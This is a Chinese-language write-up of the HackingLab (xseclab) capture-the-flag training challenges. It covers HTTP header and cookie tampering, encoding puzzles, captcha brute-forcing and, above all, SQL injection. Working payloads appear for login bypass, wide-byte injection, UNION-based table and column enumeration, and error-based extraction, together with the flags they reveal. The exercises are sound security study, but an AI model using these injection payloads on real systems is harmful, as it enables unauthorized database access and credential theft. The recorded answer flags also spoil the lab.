网络信息安全攻防学习平台

基础关

key在哪里?

查看页面源代码

再加密一次你就得到key啦~

xrlvf23xfqwsxsqf

rot13解码

keyis23ksdjfkfds

猜猜这是经过了多少次加密?

不断base64解码,若干次后得到key

key is jkljdkl232jkljkdl2389

据说MD5加密很安全,真的是么?

md5解密

种族歧视

burpsuite抓包,改包,Accept-Language:改为以下内容

Accept-Language:en-US;q=0.3,en;q=0.2

key is: *(TU687jksf6&*

HAHA浏览器

burpsuite抓包,改包,User-Agent字段加上 HAHA

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 HAHA

key is: meiyouHAHAliulanqi

key究竟在哪里呢?

F12 查看网络,在响应头发现key

key:kjh%#$#%FDjjj

key又找不到了

浏览器访问会发生重定向,burpsuite抓包修改请求头

key: ohHTTP302dd

冒充登陆用户

burpsuite抓包修改请求头,添加Cookie: Login=1

key is: yescookieedit7823789KJ

比较数字大小

F12修改元素 maxlength="3" 改为4 输入4位数得到key

key is 768HKyu678567&*&K

本地的诱惑

查看源代码得key

就不让你访问

查看robots.txt

访问Disallow: /9fb97531fe95594603aff7e794ab2f5f/

http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/

you find me,but I am not the login page. keep search.

访问login.php

http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/login.php

right! key is UIJ%%IOOqweqwsdf

脚本关

key又又找不到了

burpsuite抓包改包

key is : yougotit_script_now

快速口算

import requests
import re
url = 'http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
header = {'Cookie': 'PHPSESSID=$db3879ed8a244c77c04f65082042850c'}
resp_content = requests.get(url, headers=header).content.decode('utf-8')
matches = re.search("(.*)=(.*)", resp_content)
print(matches.group(1))

PHPSESSID的值不同,可以抓包查看PHPSESSID的值

这个题目是空的

空的

null,提交null

怎么就是不弹出key呢?

https://blog.csdn.net/a954680384/article/details/51456430

https://blog.csdn.net/qq_40980391/article/details/81161836

逗比验证码第一期

burpsuite暴力破解

逗比验证码第二期

https://blog.csdn.net/Selukwe/article/details/72802735

逗比的验证码第三期(SESSION)

同第二关burpsuite爆破

https://blog.csdn.net/qq_40980391/article/details/81161904

key is LJLJLfuckvcodesdf#@sd

微笑一下就能过关了

http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php?%5f=data:,(%E2%97%8F%27%E2%97%A1%27%E2%97%8F)

https://blog.csdn.net/qq_26090065/article/details/82503651

逗比的手机验证码

13388886666 收验证码

13388886667 登录

key is LJLJLGod!@@sd

基情燃烧的岁月

bp爆破

验证码识别

XSS基础关

禁用浏览器JavaScript,访问xssjs/xss_check.php

提示

 alert("Please use alert(HackingLab)!!");

提交

key is: myxssteststart!

XSS基础2:简单绕过

被过滤了

key is: xss2test2you

XSS基础3:检测与构造

https://www.meetsec.cn/index.php/archives/8/

注入关

最简单的SQL注入

CTF中的SQL注入 | 常规获取数据类

Tips:

用户名处提交

admin' or 'a'='a

admin' or 1=1#

admin' or 'a'='a'#

密码随意

登录成功!我的座右铭(flag)是iamflagsafsfskdf11223

最简单的SQL注入(熟悉注入环境)

查看源代码得到tips:id=1

?id=1 无回显

?id=1 or 1=1 有回显

得到 flag HKGGflagdfs56757fsdv

防注入

宽字节注入 ?id=1%df'

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1?' order by 4%23

报错了,所以只有3列

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1?' union select 1,2,3 %23

有回显

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1?' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23

查表名,得到表名:

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1?' union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655f757365725f73716c6934),3 %23

列名 id,title_1,content_1

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1?' union select 1,(select group_concat(id,title_1,content_1) from sae_user_sqli4),3 %23

1blog systemmy blog test,2so easyeasy ,229212flagishere#Hsaagdfs56sdf7fsdv,3where is flagflag is here!

到底能不能回显

limit配合procedure analyse()函数,procedure analyse()函数是MySQL内置的对MySQL字段值进行统计分析后给出建议的字段类型

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database()))),1)%23 &num=1%23

得出 article,user两个表

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23 &num=1%23

得到列名id,username,password,lastloginI

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user))),1)%23 &num=1%23

useruser,adminadmin,flagmyflagi

没有显示完

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1 procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(username,password) from user where username=0x666c6167))),1)%23 &num=1%23

flagmyflagishere

dog1.jpg存在宽字节注入,提交dog1.jpg%df'可以证明,响应包返回结果如下

在burpsuite中注入

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' order by 5 %23 HTTP/1.1
//报错 有4列
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,3,4 %23 HTTP/1.1
//返回3,回显在第3个位置
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,database(),4 %23 HTTP/1.1
//得到数据库 mydbs
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=0x6d79646273 %23 HTTP/1.1
//表名 article,pic
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x61727469636c65 %23 HTTP/1.1
//article 中的列为 id,title,content,others  
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x706963 %23 HTTP/1.1
//pic 中的列为 id,picname,data,text  
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg%df' union select 1,2,group_concat(picname),4 from pic %23 HTTP/1.1
//查看picname列
//dog1.jpg,cat1.jpg,flagishere_askldjfklasjdfl.jpg 
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg
访问图片得flag IamflagIloveyou!

ErrorBased

http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin%27%20and%20(extractvalue(1,concat(0x7e,(select%20(SELECT%20distinct%20concat(0x3a,username,0x3a,motto,0x3a,0x3a)%20FROM%20motto%20limit%203,1)),0x7e)))%23

盲注

https://blog.csdn.net/weixin_41924764/article/details/107095963

SQL注入通用防护

据说哈希后的密码是不能产生注入的

上传关

https://www.meetsec.cn/index.php/archives/9/

https://www.jianshu.com/p/b73c8910abd1

综合关

https://www.meetsec.cn/index.php/archives/11/

解密关

https://www.meetsec.cn/index.php/archives/10/

CTF网安

相关

标签